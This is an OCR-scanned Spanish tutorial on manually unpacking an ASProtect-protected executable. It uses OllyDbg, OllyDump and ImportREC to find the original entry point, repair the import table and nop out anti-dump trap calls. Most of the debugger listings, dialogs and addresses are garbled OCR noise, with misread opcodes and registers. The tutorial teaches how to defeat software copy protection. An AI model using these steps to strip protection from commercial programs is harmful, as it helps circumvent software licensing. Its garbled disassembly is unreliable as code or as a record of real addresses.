LEA ET PTR SS: [EBP-161] 


9044612C| ASPack. 86446120 


DO 


DODO( 


B 
B 


dodolo 


B 


E 
B 
a 
9 


ra, 


0 5)515) 


C 
P 
A 
- 
D 


”n ma 


FC O 


Sed NEAR» 


13 


O(FFFFFFFF) 
O(FFFFFFFE) 
D(FFFFFFFF) 
DLFFFFFFFF) 
TFFDEGOB(FFF) 
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Esta si es importante ya que esta justo después del salto semi-mágico que nos 
arreglara casi toda la TAT. 

El salto que tendremos que nopear será el que esta encima de donde nos detuvimos así 
que apuntemos la dirección donde esta ese CALL y volvamos a reiniciar con Ctrl. + F2. 
Le damos a F9, le damos a Ctrl. + G y metemos la dirección de donde estaba la CALL 
que en mi caso esta en OO9EF9C1 y le damos a OK y nos llevara a donde esta la CALL. 
Le ponemos un BP y pulsamos Alt + O y marcamos todas opciones de la pestaña 
Exceptions excepto la última: 


== Debugging options 
Commands | Disasm | CPU | Registers | Stack | Analysis 1 | Analysis 2 | Analysis 3 | 
Security | Debug | Events — Exceptions | Trace | SFX | Strings | Addresses | 


[4 Ignore memory access violations in KERNEL32 


lgnore (pass to program) following exceptions: 
[42 INT3 breaks 
[Y Single-step break 
[Y Memory access violation 
[Y Integer division by O 
[Y Invalid or privileged instruction 


Ignore also following custom exceptions or ranges: 


¡Add last exception | 
¿Add range | 
Delete selection | 


Undo | Cancel | 


Damos a OK y ahora Shift + F7 y F9 y llegamos al BP. 
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== VAYA Y Y Y Y Y Y YY 2 2 2 JH) 2 2 3 == 


56 PUSH ESI FP E 
3B45 BL ES ESO DWORD PTR SS: [EBP+C0] YC92188A ntdll.RtliDeleteClriticalSection 


50 
ES 1BFCFFFF 


m 
E 
2 
Je 


MOU EDX, DWORD PTR DS: [EDI] : 
MOU DWORD PTR_DS: [EDX],EAX > OOLSFF2C 


I 0012FE2B ASCII "DeletelriticalSection” 
Cap TS Il O012FFS6 Ñ i | 
CMP EBX,4 P BB9EF9CÍ 


MOU AL,BYTE PTR DS:[ESI] it DLERFFFEFR) 


MOU BYTE PTR SS: [EBP-11,AL a dp aadadaa 

ne ER ECH 1 it OLFFFFFFFFI 
84D FF MOU CL,BYTE PTR_SS: [EBP-11] + ed 
ebes FFFEFFFF |LEA EAK,DUORD PTR SS: LEBP-1011 ó 
O [A 00 * ERROR_SUCCESS (00099999) 
sA OA PUSH_Bl 


A sols 46 (NO,NB,E,BE,NS,PE,GE,LE) 
B9 AC399FOB MOU ECX, 9F39AC S . a 
33D2 XOR EDX, EDX 
3A55 FF MOU DL,BYTE PTR_SS: [EBP-1] 
8D35_FFFEFFFF |LEA EAX,DWORD PTR SS: [EBP-101] 
ES _97CAFFFF 

LEA ESI,DWORD_PTR_SS: [EBP-161] 


8DBS_FFFEFFFF 
EB 62 
MOU ESI, DWORD PTR DS:[ESI] 


E 
pridl= PO nel 321 SPUOZODI 
FST 4020 Cond 1800 0100000 (ED) 
PUSH_ESI FC B27F Prec NEAR,53 IIA 


PUES qe DWORD PTR SS: [EBP+C] 


n 
a 
E 
Y 


ES BEFBFFFF 
AS 5C359FOB MOU DWORD_PTR DS: [9F355C7,EAX 
B3 9CC59E0B MOU EAX, 9ECS9C 

a3B17 MOU EDX, DWORD PTR DS: CEDIJ 


16446120] ASPack. 06446120 


DO 
DOE 

OO OOOO 
Y 


Y Ne 
aaa aa 
aaa 
1 w 
de 
w 
1 
E 


COAOAAOATOAAAAAammamma mr ra ras] 
Tu 


Parece que vamos bien, jeje, miren el valor que se encuentra en EAX. Es una entrada 
buena a la IAT. Pues quitemos el BP y nopeemos el CALL y vamos trazando con F8 
hasta que vemos un POPAD (hay que tracear muy poco, en mi caso con pulsar 15 veces 
F8 llegue a el). 
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PUSH _EBXx 
CMP_ AL,2 


eteClriticalSect ion 


MOUZX ECX,BYTE PTR DS: [ESI] 00446120 
INC ECX Lao 

EB 05 js 

E9 04000000 MOU ECX,4 

ÉS ELFCEFFF 

SB bB446120 


EB CE 
6l 


ca it OCFFFFFFFE) 

Es 3n000000 + 

68 91FC9E08  |PUSH 9EFC91 EA lo OLEREREREE) 

FEa424 INC DWORD PTR SS: [ESP] De aaa 

EC 8p44z40c — [MOU ESP, acoggasa A 
DO 


LastErr ERROR_SUCCESS 
216 (NO,MNB, NE, A, 


3683 S0B30000 |*CHG BYTE PTR DS: [EBxX+B880], AL 
155153 ADD BYTE _PTR DS: [EDxJ,AL 


EB 1A 
EC EB17ESEB MOU ESP, EBES17EB STO empty 
14 ES AL, BES ST1 empty 


EB 11 ] empri 
ES EBOEESEB empty 0 
OBES 


mpty 
mpty 


empty 


— 


> empty 1. JOB 
7? empty S36,€ alajals 
10 PUDO Zo DT 
ST 4020 BO 106600 (EN 
Cu B27F 1.53 5 Us MS Ln MO 


ES 01 
DBSEFCCO|- ES 64892031 — |JMP S18F 

Stack [O0IZFFIGI=00A3200C (BBAS2D0C), ASCII "kernel3z.d11” 
EBX=0012FF80, (ASCII "BaD"”) 


32D6C| ASCII "kernel32.dl1” 


concosassosas.ss - - ASCII "OIX” 


Do 
DI 


Dí 
aaa 
od 


De 
me 
Si 


Dm 


Lido 
DD 


Tod 


DO 


1515] 


00D 


Bueno, en la anterior imagen podemos ver el POPAD, pero no solo eso, también 
podemos ver que nuestro primer valor de la IAT ya si que parece una entrada de la 
IAT buena. Para que nos la repare toda sin tener que tracear para reparar toda la 
IAT, pongamos un BP en el POPAD y demos a F9. 
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EF PUSH_EBX : 
== CP DAT oaserc7a III ] 
EF ar Mou2s ECx, BYTE PTR DS: [ESI] TECOS 


BOAS429E 
BO12FF44 


pd 
O 
m 
ly] 
x 


EB 5 
B9 04000008 MOU ECXx,4 
B1CE 


OB12FF88 
ADD EST, ECX 
a0A34332 

ES CIFCFFFF | CALL CDBSERS4a ASPack. 00446680 
SB POP EBX 00446680 ASPack. 10446685 
a ++ cis ES 8803 

CO ES 0; it OLFFFFFFFE) 
Es 3nesaaaa - Le Bl : 
68 S1FCIEGO  |PUSH 9EFCOÍ a ERRE 
FFa424 INC DWORD PTR SS: [ESP] JE E S OLEFFEFEEE! 
Cc3 RETN 50 a it ?FFDDBGO(FFF) 
EC Bp4424ac  [MOU ESP. ac249488 A E 


o 


GE,LE) 
0208 


3683 30B30000 |*CHG BYTE PTR DS: [EBx+B888],AL 
paB2 ADD BYTE _PTR DS: [EDXJI, AL 


EB 1A 
BC EB17ESEB MOU ESP, EBES17EB 
14 ES DC 


(5 


ES 11 
ES EBBEESEB 
OBES 


DOLC-CONTCD 
ODIZID 
PEDA 

m 
D 00D _ND 
POISiomir 
o múno 
m DIAM 
mm XxO_0 


ADD EAx,EBP 
OR EAXx, EAX 


x 


Ll 
3 
ra 
o 


N 
PUSH DWORD _PTR_ FS: CEAXJ 


ASCII ”OIx"” 


0000000 OOOO 


bp 7fROfODO | 
E ———AAAAI¿¿43dá—=>—>m AA A A AOAS<Á 


Mirad que bien quedo la IAT, jeje, ahora quitemos el BP y con el - del teclado vamos 
volviendo hacia atrás hasta llegar a los nops de la CALL que nopeamos y una vez allí 
seleccionamos todos los nops que forman parte del lugar donde estaba el CALL, 
hacemos clic derecho y le damos a Undo Selection para dejarlo como antes y que no 
nos detecte Asprotect: 
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E NAAA A A AAA PPP i= 88] 5] 
E MOU BYTE PTR SS: LEBP-11,AL 
0BODODDO 


EBX, EBX o 00: 

MOU BL, EsTe PTR $8: [EBP-1] 00446698 ASPack.00446698 
8BCB MoU ECX, E Xx BBAS429E ASCII "wininet.dll” 
SDSS FFFEFFFF |LEA EAX:DUORD PTR SS: [EBP-1913 OOL2FF44 
SBD6 MOU EDX,ESI EP OB12FFS8 


OB9EF99S| E8 EB4BFFFF SI 00A34332 


GOSEFÍSD| 6 PUSH BA , 
SEFO B2 B6399Fa8 — [OU ECX, 9F39B6 00446688 ASPack. 00446689 
ElP DB9EFCSZ2 


£BD03 MOU EDX, EBX 

8D35 FFFEFFFF [LEA Eno" DWORD PTR SS: CEBP-101] ES 0023 

Es EBCAFFFF CS 6B1B 3 
Ss 4B23 


ca 
SDBS FFFEFFFF [LEA ESI,DWORD PTR SS: [EBP-101] 5d 
56 PUSH _ESI 21 D3 0023 
8845 ac MOU EAX, DWORD PTR SS: [EBP+C] S a FS 003 
7] PUSH EAX 76 

DO 

06 


O(FFFFFFFF) 
O(FFFEFFFF) 
OLFFFFFFFF) 
it BLFFFFFFFF) 
t ?FFDDGOA(FFF) 


32bi 
ES 1BFCFFFF GS 60068 NULL 
29 LastErr ERROR_SUCCESS (600000008) 
EFL 00008246 (NO,NB,E,BE,NS,PE,GE,LE) 


STO empty -UNORM BE1C 00000045 B20SBBSE 
STi empty —-UNORM BA4C 09B0BBBOS MABABDAD 
ST2 empty 0.B192141235640032540e-4933 
ST3 empty +UNORM 0945 BB12BA4A BABABBBA 
ST4 empty 6M.01920943930903772850e-4933 

= STS empty +UNORM 6114 7CS8BF23D 7C91EB51 
Undo selection + BKS ST6 empty 1. 00000000000 BBBDaODO 


ST? empty 8d. BOLOLODOCALABecUÓ 
Sho Assemble Space 210 ESPUOZDI 
e FE Ñ ST 4020 CondiB0Ó0 Eród100000 
Pr Label : FCW 027F Prec NEAR,53 Mask A 
3309 Comment F 
2A4D FF 


8D85 FFFEF — Breakpoint 
3BD6 
ES 104BFFF 


Ctri+Gray * 


New origin here 
Go to 
Follow in Dump 


o E Search for » 
e E) — Findreferences to » As ATI ae 
616€ e Analysis » Adi: oa12FFES 
Cc Conditiomal Branch Logger » te! ¡Om! 
Run Script > A 


Dump debugged process 


Appearance y 
C| ASPack. 00446690 


RETURN to ASPack. 


ASPack . B446863E 
RETURN to ntdll.7 
YC923E62| RETURN to ntdll.? 


y 


00000 
"QUO dC 
20 
=m 


DUNAS 
o 


9044629C 


Ahora volvemos a pulsar Ctrl. + O y volvemos a dejar desmarcadas todas las opciones 
menos la primera: 
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ES Debugging options 


[4 Ignore memory access violations in KERNEL32 


Ignore (pass to program) following exceptions: 
T INT3 breaks 
T— Single-step break 
Memory access violation 
[Integer division by O 
Invalid or privileged instruction 
T ANFPU exceptions 


[Ignore also following custom exceptions or ranges: 


¿Add range | 


Undo | Cancel | 


Aceptamos y le damos a F9 y empezamos a contar las excepciones incluida la primera 
que te da a al darle a F9. En mi caso, a la 10 ya arranca el programa así que vuelvo a 
reiniciar el Olly y vuelvo a hacer todo igual para reparar la TAT hasta volver a llegar a 
este punto donde ya se que tengo que parar en la excepción 9% en mi caso. Una vez 
parado en la ultima excepción antes de que arranque el programa, voy al Memory Map 
con Alt + M y pongo un Breakpoint on Memory Access en la sección .code del 
ejecutable y le doy a F7 y F9 y nos parara en el OEP y esta vez con la LAT 
prácticamente reparada. 
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Aa Ed 1 EIA EEES Al > CPP 512] 


Registers (FPU) ES 


and 

033 SBEC HOU ERP. ESP N BO44289C HsPack. 
4 8304 F4 ADD ESP, -0C ; 

04 ES 4DOBFCFF SSCO0S nel Ll ze 
54 OC21FCFF . 


¡10 


(3) 
6354FCFF BO12FFC4 


DECÉFCFF P ODI2FFFO 

31 7C923E62 ntdll.7( 
374DFDFF YC923E6F ntdll.7C923 
EG1AFEFF EI. pl ASPack. 10442390 


FOB6FEFF Es : 
ES99FEFF ; BZ it OLFFFFFFFE) 


a it BLFFFFEFFF) 
633AFEFF 0 e OLFFFFFFFE) 
An 0 2bit DLFFFFFFFF) 
3MBAFEFF . ; LL CEFOFOBO(FFF) 


GFBAFEFF 
FABAFEFF 
69ELFEFF 
A4AFFFFF 


ODO 
SOS 


y 
p OS 


stErr ERROR_ SUCCES: $ 
BOB10206 (NO,MB, NE, 


a enpty —UNORM BELO 
38294400 — [|MOU EDx,442938 ñ y UNEN os 


30564400 MOU EAX, DWORD PTR DS: [445630] 
ES DFODFEFF 
FF1S 00494400 
Al 30564408 MOU EAX, DWORD PTR DS: [445630] 
ES S311FEFF 


+UNORM_ 09 


a. 913209483: z 


36. eoseVsoacoseosenso 


ES D21BFCFF PUODZDI 
2BES E »EBP FST 0020 Cond Dd 800 Err 6 3 100006 
FCW 027F Prec NEAR,53 Mask LAA 


RETN 
3% BYTE PTR DS: [EAX],AL 


PUSH ES 
BYTE PTR DS: [EAXI¿AL 


rcsl6 743 RETURN to kerne 
E6F| RETURN to ntdll. 
RETURN to ntdll, 


a iBUG io 


DODOO 
DON DANS 
DD O re 5 mom D 0 


EU 
+u ru ciao 
>| NO rw-k AC 


ASCII "hs" 


A PA 

a Cc BC 
a E AC 
a Cc CA 
als Cc 9E 
a c FF 8 
a c 6b 
a c EF 8 
a Cc D2 36 
a Cc 7 BA si 

c 4 CA 9E 


Este es el momento de dumpear y yo lo haré con el plugin para Olly OllyDump así que 
adelante: 
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- [CPU - main thread, module ASPack] 
[c] File View Debug APM Options Window Help 


CEL! JM 1 +ee-our 


2 Asprotect_1.2x_XP » 


> Xx BB44289C AS 
? lll CX 70926315 
4 Conditional Branch Logger » Xx 7 
5 DilBreakEx » 
6 Hide Debugger » I 7C 702 
8 OllyDump » Dump debugged | process atF 
9 Punto Elventos » atF 
: ( ) Find OEP by Section Hop (Trace into) E 
0 WindowJuggler » j j SF 
, Find OEP by Section Hop (Trace over) ' 
EFBAFEFF 
FABAFEFF A Lsuc 
69E1FEFF Options E e 
MOU EAX, DWORD PTR DS: [£ About EIC 
MOU EDX, 442938 A NOESOrIO 5126 
al tirita, MOV, EA ONORO EAX¿DWORD PTR DS: [445630] ST3 empty +UNORM 0945 


OllyDump - ASPack.exe 


Start Address: [400000 Size: [7000 
[1000 => Modifye [42890 Get ElP as OEP | Cancel | 


Base of Code: fi 000 Base of Data: [43000 


ÍV Fix Raw Size £ Offset of Dump Image 


| Section | Virtual Size | Virtual Offset | awSize | Raw Dífset_ | Charactaristic 4 


Entry Point: 


00042000 
00002000 
00001000 
00002000 
00002000 
00001000 
00001000 


00001000 
00043000 
00045000 
00046000 
00048000 
00044000 
00048000 


00042000 
00002000 
00001000 
00002000 
00002000 
00001000 
00001000 


00001000 
00043000 
00045000 
00046000 
00048000 
00044000 
00048000 


A Method! : 3 Search JMPIAPI] | CALL[API] in memory image 
C Method2: Search DLL £: 4Pl name string in dumped file 


C0000040 
20000040 
20000040 
C0000040 
C0000040 
C0000040 
20000040 


Nos aparece una ventana como la de arriba a la cual le desmarcamos la opción Rebuild 
Import y le damos a Dump y en la siguiente ventana elegimos un nombre y una 
ubicación y le damos a Guardar y ya tenemos nuestro dumpeado. 
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Save Dump to File 


Guardar en: |) ASPack "| qu er En» 
a setup 5 
¡e 
> ASPack,exe 


Documentos uninstal.exe 
recientes 


a 


Escritorio 


Mis documentos 


Mis sitios de red Nombre: ldumpeado.exe v| 
Tipo: [Executable file[.exe] y] Cancelar | 


Ahora le vamos a reparar la IAT y para ello usaremos Import Rec. 
Lo ejecutamos y como se muestra en la siguiente imagen, buscamos en la lista nuestro 
proceso para atachearlo y hacemos clic encima. 
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$ Import REConstructor v1.6 FINAL (C) 2001-2003 MackT/uCF 


Altach to an Áctive Process 


c:4archivos de programa import reconstructor 1.6rimport reconstructor v1.6 finaltimportrec.: A 
ci4archivos de programa aspacktaspack.exe (00001150 3 
c windows system324notepad. exe (00001 74,8] 

c:4archivos de programatmicrosoft officevofficel1Mwinword. exe (OODDOBB 4) 

c4archivos de programatollydbg 110vollydbg.exe (00001054) 

c4archivos de programa! windows live+maillwlmail. exe (OD0D07DO) 
cAwindowstsystem324wscntfy. exe (00001500) 

c windows, system324ntvdm.exe (00001718) 

c4archivos de programa! bitcomet'bitcomet.exe (00001 4B 4) 

cAtvriter exe (O00D0D 4,8 


Clear Log 


lAT Infos needed New Import Infos (IID+ASCI+LOADER] Options 


oEP | A 
Ava | Size | v 


¿bout 


Exit 


ik DLL | 
Show Suspeoi 
[tuto Trace | 
Clear Imports | 
_Clemlog | 
Options | 
Em | 


Ahora llega el momento de meter el OEP, RVA y Size y para eso lo apuntamos todo 
antes. 

El Oep es el que tenemos apuntado menos la Image Base que es 400000. 

44289C - 400000 = 4289C Axial que ya tenemos el dato para meter en el OEP. 

El RVA es el inicio de nuestra IAT menos la Image Base así que: 

446128 - 400000 = 46128 


Y el Size es el tamaño de nuestra TAT. 


Metamos solo el OEP y demos al botón TIAT AutoSearch a ver que pasa. 
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$ Import REConstructor v1.6 FINAL (C) 2001-2003 MackT/uCF 


-Blttach to an Active Process - 


| c4archivos de programa aspacklaspack.exe (00001150) v 


Imported Functions Found 
2FThunk:00046120 MbFunc:1F (decimal:31] valid:NO 

user32. dll FThunk:0004614C NbFunc:1 [decimal:1] valid: YES 
oleaut32. dll FThunk:000461B4 NbFunc:5 [decimal:5) valid: YES 
adwapi32.dll FThunk:000461CC NbFunc:4, (decimal:10)] valid: YES 
2 FThunk:000461F8 NbFunc:3C [decimal:60) valid:NO 

version. dll FThunk:000462EC NbFunc:3 (decimal:3] valid:YES 
adi32.dll FThunk:D000462FC NbFunc:34 [decimal:58] valid: YES 
user32. dll FThunk:000463E8 NbFunc:8C (decimal: 140) valid:YES 
shell32.dll FThunk:0004661C NbFunc:1 [decimal 1] validYES 


Id 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 


Log 


Current imports: 

C [decimal 12] valid module(s) (added: +C (decimal: +12)) 

14F (decimal:335] imported function(s). (added: +14F (decimal: +335]] 
8 (decimal:8] unresolved pointer(s)] (added: +8 (decimal: +8 


147 Infos needed 7 New Import Infos (1D+4SCIH+LOADER]— 


DEP [00042890 187 AutoSearch | RVA [00000000 Size [00001 20€ 
RAYA [000461 28 Size (00000578 7 Add new section 


Load Tree | Save Tree | Get Imports | Fis Dump [ | EE] | 


Como vemos, todos los datos coinciden así que vamos bien. Ahora demos al botón Get 
Imports y nos deben de aparecer todas las llamadas a las apis que realiza nuestra 
IAT. 

Pero hay un problema, como pueden ver arriba, hay entradas malas que tendremos que 
resolver nosotros pero antes me queda un ultimo cartucho, usaremos el plugin para 
Asprotect 1.22 que se le puede meter al ImportRec y que en mi caso ya lo trae así que 
hago clic en el botón Show Invalid y acto seguido clic derecho encima de la lista que 
aparece y ejecuto el plugin. 
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$ import REConstructor v1.6 FINAL (C) 2001-2003 MackT/uCF 


Attach to an Active Process 


| c4archivos de programataspacktaspack.exe (00001150) ” 


Imported Functions Found 
+ ?FThunk:0004612C NbFunc:1F [decimal:31] valid: NO 
+) user32.dll FThunk:0004614C NbFunc:1 [decimal:1] valid: YES 
+)- oleaut32. dll FThunk¡ “A “valid: YES 


Pick DLL 


; 


Show Invalid 


Show Suspect 


> advapi32 dl FThunk Invalidate Functionís) 
+ ?FThurk:D00461FE 
+) version. dll FThunk:C 
> gdi32. dll FThunk:D0: 
+ user32.dll FThunk:0) 
> shell32.dll FThunk:0 


rva:00046284 forwardec 


- 


Current imports: 


decimal: 335 


2 18,1 Infos needed 


DEP [00042890 137 AutoSearch | 
Aya, [000461 28 Size [00000578 


3 : valid: YES 
Disassemble | HexView 


C (decimal:12) valid moc - 
14F (deci ] 


lid. YES 

lid:YES 

valid: YES 

IG YES 


Plugin Tracers Null 


Trace Levell (Disasm) 
Trace Level2 (Hook) 
Trace Level3 (Trap Flag) 


Clear Imports 


Advanced Commands ASProtect 1,22 


Cut thunkís) 
Delete thunk(s) 


Expand all nodes 


Clear Log 


Collapse all nodes 


RAYA ¡DODODODO 


Size (00001 20€ 


ly Aug pon sacion 


New Import Infos (1ID+45CI+LOADER]— 


Load Tree | Save Tree | [Gt Impors]| 


Y el resultado es... 


Fiz Dump [ 


Options 


About 


Exit 


ehl lo BL 
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$ Import REConstructor v1.6 FINAL (C) 2001-2003 MackT/uCF 


-Aáttach to an Active Process 


lc: Varchivos de programataspackaspack.exe (00001150) y] Pick DLL | 


Imported Functions Found: 
rea:D004615C mod:kemel32. dll ord:0176 name:GetModuleHandleá, , Show Invalid | 
rva:D00046160 mod:kemnel32. dll ord:0174 name:GetModuleFileN ames, 

rva:D00046164 mod:kemnel32. dll ord:0169 name:GetLastError = Show ¡Show Suspect] 
1va:00046168 mod:kemel32. dll ord:0104 name:GetCommandLines, 

rva:D0004616C mod:kemel32. dll ord:D0B8 name:ExitT hread 

Clear Clear Imports | 


rva:D0046170 mod:kemel32. dll ord:D006D name:CreateT hread 
rva:D0046174 mod:kemel32. dll ord:038€C nameWiteFile 

rva:D00046178 mod:kemel32. dll ord:0307 name:SetFilePointer 
rva:D004617C mod:kemel32. dll ord:02FE name:SetEndOfFile 


Log 


Current imports: 

E [decimal:14) valid module[s) (added: +2 (decimal: +2)) 

14F [decimal:335) imported function(s]. 

0D (decimal: 0] unresolved pointer(s]] ladded: -8 (decimal: -8 

Congratulations! There is no more invalid pointer, now the questions: Will ituwork? :-] 


187 Infos needed - New Import Infos (11D+45CIW+LOADER] — 


copa D004283C _lAT AutoSearch | _lAT AutoSearch [| Ava [o00OD0DO Size [ODODT84E 
Aa Jo 00046128 Size [00000578 IY_ Add new section 


Load Tree | Save Tree] Get _Getlmports | _Getimpate || Fiz Dump 


Como se puede apreciar, en el Log nos dice que ya no quedan mas entradas malas por 
resolver y nos felicita. 
¡Ya la tenemos reparada! 


Ahora demos al botón Fix Dump y elijamos el dumpeado que hicimos antes: 
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Choose your dump file to fix 


Buscar en: | (O ASPack ” | 


(setup 


49 $ ASPack.exe 
U 


Documentos 
recientes 


El 


Escritorio 


[A uninstal.exe 


Mis documentos 
Mi PC 
e. Nombre: [dumpeado. exe r| 

Mis sitios de red Tipo: [PE files [f.exe, * dll) y| Cancelar | 


Abrir como archivo de sólo lectura 


Le damos a Abrir y... 


En el Log nos dice que el archivo se guardo sin problemas así que intentemos ejecutar 
nuestro dumpeado a ver que pasa. Ojo, el dumpeado con la TAT correcta se guardara 
como dumpeado_.exe. 


Application Error 


Q Exception EAccessYiolation in module dumpeado_.exe at DOSEB76C, 


Access violation at address OOJEC9AD, Write of address ODODODO1. 


Bueno, este Asprotect tiene algunos ases en la manga pero intentaremos derrotarlo. 
Carguémoslo en otro Olly . 


Bueno, aparecemos en el OEP bueno y el método que voy a usar para sacar el error es 
el siguiente. 
En el Olly con el dumpeado, dejo pulsada F8 hasta que me da la siguiente excepción: 
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Access violation when writing to [00000001] 
Si miramos la pila vemos justo arriba del todo: 
0012FFBO 0044291B RETURN to dumpeado.0044291B from OO9EC9AO 


O sea, que donde estamos hemos llegado desde un CALL y si todo hubiera ido bien nos 
habría retornado a 0044291B así que vayamos allí a ver que vemos. Para ello hacemos 
clic derecho sobre esa entrada de la pila y elegimos Follow in Disassembler o pulsamos 
Intro y apareceremos en el retorno de esa CALL. 


Es curioso pero estamos unas líneas mas abajo del OEP y el CALL que nos mando allí es 
el que esta justo encima y es el único de todos los que vemos ahí que usa una dirección 
indirecta. 

Pues bien, vayamos al Olly que tiene el programa original parado en el OEP y vayamos 
con F8 hasta llegar a ese CALL sin ejecutarlo y cuando estemos encima de el pulsamos 
F7y vemos: 


Es Lo : 
532 e 2coFOD (CMP DWORD PTR DS:[9F25841,0 E dl 


? 
ES SFFFFFFF 
SEC999| SE 
AO9ECIIA| 5B 
5e| 5D 
C2 6800 
90 NOP 
$330 ASIS9FOB 1 CHP_DWORO_PTR DS: L9F35A81,0 
FE1S AB3S9FOO 
Al 54369F00 
C3 


ASPack.004427C0 


MOU EAX, DWORD PTR DS: [9F3654] 
MOU EAX, ERX 
H_EBP 


MOU EBP,ESP 

MOU_EAX, DWORD PTR SS: CEBP+8] 
AX, EAX 

STO empty 6.0601 

ST mpty -5,509" 

2mpt y —UNORI 

empty —UNORI 

MAN_1 


5 B7 
60359F00 
E B6 


JMP to kerne132,GetModu leHandleA 


a 
ASPAFFFF 
0400 


JMP to kerne132.GetModu leHandleA 


ES _9D7AFFFF 

FF35 40369F90 | PUSH_DWORD PTR DS: [9F36407 
AB9EC: 53 POP EAX 

ABIECIEZ C3 
BB9ECIES| C3 


Pues vale, guardemos esta dirección por si nos volviera a hacer falta y ahora con F7 
vamos traceando a ver que pasa y veremos que no se cumple la condición y el salto no 
se realiza y nos quedamos parados un momento en el CALL que esta justo después del 
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salto para ver a donde va ya que justo después tenemos un RETN y ese CALL es lo 
ultimo que se ejecutara en ese trozo de código y veremos esto: 


OO9EC9A9 FF15 A8359F00 CALL DWORD PTR DS:[9F35A8] 
ASPack.004427A8 


O sea, que eso es lo mismo que un CALL 00442748, pues apuntemos eso también que 
va ha ser vital, 

Ahora vamos a comprobar algo; estando parado en el CALL, pon un BP en el salto que 
tienes justo encima y que no se realizo antes porque la condición no se cumplía. Ahora 
quitemos el BPM y demos a F9 a ver si vuelve a parar ahí. 

Bueno pues ya os digo que no para y como 004427C0 esta dentro del código del 
ejecutable pues vamos a hacer algo. 

Sabemos que: 


00442915 FF15 0C494400 CALL DWORD PTR DS:[44490C] 
Nos manda de cabeza a ... 


OO9EC9A9 FF15 A8359F00 CALL DWORD PTR DS:[9F35A8] 
ASPack.004427A8 


Y que este ultimo CALL es igual que hacer CALL 00442'7C0 


Pues me la juego, voy a hacer algo interesante porque no tendré ni que crear ningún 
tipo de injerto especial ni nada, simplemente cambiare al primer CALL para que vaya al 
lugar que va el otro CALL ya que el error que me da en el dumpeado es porque el salto 
indirecto del primer CALL no esta bien y con esto podríamos solucionarlo. 

Quedaría así: 
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UU MIE SU. UTIL 


DURA COLI co po7mrcrr AD 
23 ES CEASFEFF dumpeado. 0042CEAC 2 1 
ES 9S5ABFEFF dumpeado. 100420473 Sa 
ES 3MBAFEFF dumpeado. 0042E318 TO 
ES 6FBAFEFF dumpeado. 1042E35C DO 
ES FABAFEFF dumpeado. B542E3EC 00 
ES 69E1FEFF dumpeado. 00430460 = 
ES A4AFFFFF dumpeado. 004308A9 


MOU EAX, DWORD PTR DS: [4456307 
dumpeado. 66423908 


ado. 
MOU EDx, 442938 ASCII "ASPack” 
MOU EAX, DWORD PTR DS: [4456307 


00442901 
00442906 BA 38294400 
1044290B Al 30564400 


AB442910 ES DFADFEFF dumpeado. 104236F4 
BB442915. ES SEFEFFFF dumpeado. 00442748 
BB44291A. 96 NOP 
Al 30564400 MOU EAX, DWORD PTR DS: [445630] 
ES S311FEFF dumpeado. 10423478 
Es D21BFCFF dumpeado. 104044FC FST 
S3BES5 MOU ESP,EBP FC 
ES POP EBP il 
[aJals[s] DD BYTE PTR DS: [EAXJI, AL 
FFFF Unknown command 
FFFF Unknown command 
a6 PUSH ES 
B000 ADD BYTE PTR DS: [EAXJ,AL 
6641 53 ADD BYTE PTR DS: [ECX+531,AL 
56 PUSH _EAX 
61 POPAD 
00442931 636B 40 ARPL_ WORD PTR DS: [EBxX1,BP 


0044293] 0888 ADD BYTE PTR DS: LEAX], AL = 


Ahora guardemos los cambios seleccionando las líneas que hemos modificado y 
haciendo clic derecho y dándole a Copy to Executable->Selecction y acto seguido 
reiniciemos el Olly que tiene el dumpeado y ejecutémoslo a ver que pasa ahora. 


Y nos vuelve a dar otro error igual que el de antes. Axial que lo mismo, miremos en el 
Stack a ver si hay suerte y... 


0012FEOO 0043F1BE RETURN to dumpeado.0043F1BE from OO9EC8F4 


Pues vallamos a 0043F1BE colocándonos encima de esa entrada del Stack y dándole a 
Intro a ver que se cuece por allí. 
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33D2 S0R EDX, EDX STO 


8B45 FC MOU EAX, DWORD PTR SS: CEBP-41 ST1 palnitd 
3309 58020009 |MOU EAX,DWORD PTR DS: [EAX+258] ST2 empty 
ES FD3EFDFF  |CALL AB413098 dumpeado. 00413998 ST3 empty 
8B45 FC MOU EAX, DWORD PTR SS: CEBP-41] ST4 empty 
3899 E4020000 |MOU EAX, DWORD _PTR_DS: [EAX+2E4] STS empty 
C649 20 Bn YTE_PTR DS: [EAX+207,0 STÉ empty 
R EDX, ST? empty 

MOU EAX, DWORD PTR SS: LEBP-4] : 


MOU EAX, DWORD PTR DS: [EAX+27CJ 


8845 FC 

Se80_7CO20000 AS 

ES 1CSFRDAF SALE BucRd Efe 0: cas49042 dumpeado. 80413004 FCW 027F 
33000000 dumpeado. 0043F246 

26:F4 HLT 


Privileged command 


F2: PREF IR. REPNE: Superf luous prefix 
BS A1344EBD MOU EAX, BOBE34A1 


oP 
6BOF 5 IMUL ECX, DWORD PTR DS: [EDIJ,5 
FS cLc 


58 POP _EAX 
DBDS FCMOUNU ST,ST 
480 DEC ESP 
dumpeado. 0043F188 


2043F1D _ 
Do4Pode=dumpeado. DO4SFZdS E 


> ERNEGEE] 0073FIBE|RETURN to dumpead 
¡Address [Hex dump_________ [ascii | a PeeñEGeEA 1043F1BE| RETURN to dumpead 


Pues miremos en el original a ver que hace el CALL que tenemos justo arriba que es el 
culpable del error. Simplemente vamos a la dirección donde esta la CALL y damos a 
Intro y, sorpresa sorpresa, jeje, lo único que hace es ir a esa zona que se crea en 
ejecución y donde solo se encuentra un RETN con lo cual ese CALL es simplemente una 
trampa para que no lo podamos dumpear limpiamente así que nopeemos ese CALL en el 
dumpeado y quedara así: 


3B45 FC MOU EAX, DWORD PTR SS: LEBP-4] 

3636 5386200008 |MOU EAX, DWORD PTR DS: [EAX+2587 

ES FDSEFDFF dumpeado. 00413098 
3B45 FC MOV EAX, DWORD PTR SS: [EBP-4] 

8B50 E4020000 |MOU EAX, DWORD _PTR_DS: [EAX+2E4] 

502 20 Bn 5 TE_PTR DS: [EAX+20],0 


R EDx, 
3B45 FC MOU EAX; DWORD PTR SS: LEBP-4] 
3630 7C020000 |MOU EAX, DWORD PTR DS: [EAX+27CJ E 
SS 1C3FFDFF dumpeado. 80413504 FC 


10 00 00 00 00 00 00 O 
y Id Pudo Pu uu Pu Pu a 


El] 
33009000 JMP 0043F246 dumpeado. 0043F246 
26:F4 Privileged command 


ESI 
F2: FIX REPNE: Superf luous prefix 
A134BEBD MOU EAX, BDBE34A1 


243F1C POP 
